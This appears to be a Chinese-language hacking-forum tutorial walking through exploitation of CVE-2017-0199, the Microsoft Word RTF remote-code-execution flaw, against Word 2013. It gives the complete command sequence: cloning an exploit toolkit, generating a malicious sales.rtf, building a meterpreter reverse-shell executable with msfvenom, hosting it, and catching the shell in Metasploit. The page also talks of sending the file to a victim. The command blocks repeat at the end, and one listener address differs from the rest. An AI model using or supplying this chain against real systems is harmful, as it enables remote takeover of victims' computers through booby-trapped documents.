taibeihacker
Moderator
Microsoft Word下的惡意RTF文件容易被收到攻擊,在本文中,我們使用python腳本對Microsoft Word 2013進行oday攻擊演示,該腳本會生成惡意的.rtf文件,並提供目標系統的篡改會話。利用工具包CVE-2017-0199 - v2.0是一個很有用的python利用腳本,它提供了一種快速有效的利用Microsoft RTF RCE進行攻擊的方式。它可以生成惡意的RTF文件,並將metasploit 下meterpreter反彈shell有效載荷提供給攻擊者,而不需要任何復雜的配置。测试环境:攻击者:Kali Linux(ip:192.168.1.24) 目标:Windows 10( Microsoft Word 2013 )1.打開您的kali Linux的shell終端,然後輸入以下命令生成一個惡意rtf:
git clone https://github.com/bhdresh/CVE-2017-0199.git
此命令將運行一個python腳本來生成富文本格式的有效載荷,其中-M用於生成rtf文件,-w用於生成rtf文件的名稱,即sales.rtf, -u為攻擊者的IP地址或域名。
cd CVE-2017-0199
python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.24/raj.doc
以下截圖中的命令輸出生成的惡意.rtf文件即sales.rtf文件可以在系統中找到。在我們將這個文件發送給被攻擊者之前,我們需要將它嵌套到任何後門文件中,以便我們可以建立與被攻擊者的反向連接。
2.在新終端shell上,使用msfvenom來生成一個exe的有效載荷,以便進行攻擊。其命令如下:
Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.24 lport=4444 -f exe /root/Desktop/raj.exe
3.現在將raj.exe和sales.rtf移動到/var/www/html中
4.現在鍵入以下命令,將raj.exe與sales.rtf進行合併。然後,啟動多個處理程序以反向連被入侵者。其命令如下:python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.24/raj.exe -l /var/www/html/raj.exe
5.當受害者打開sales.rtf文件時,攻擊者將會在metasploite框架內收到反彈shell
msfconsole -x 'use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run'
或者
msf use multi/handler
msf exploit(handler ) set payload windows/meterpreter/reverse_tcp
msf exploit(handler ) set lhost 192.168.1.24
msf exploit(handler ) set lport 4444
msf exploit(handler ) exploit
syspreter sysinfo
git clone https://github.com/bhdresh/CVE-2017-0199.git

此命令將運行一個python腳本來生成富文本格式的有效載荷,其中-M用於生成rtf文件,-w用於生成rtf文件的名稱,即sales.rtf, -u為攻擊者的IP地址或域名。
cd CVE-2017-0199
python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.24/raj.doc



Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.24 lport=4444 -f exe /root/Desktop/raj.exe



msfconsole -x 'use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run'
或者
msf use multi/handler
msf exploit(handler ) set payload windows/meterpreter/reverse_tcp
msf exploit(handler ) set lhost 192.168.1.24
msf exploit(handler ) set lport 4444
msf exploit(handler ) exploit
syspreter sysinfo
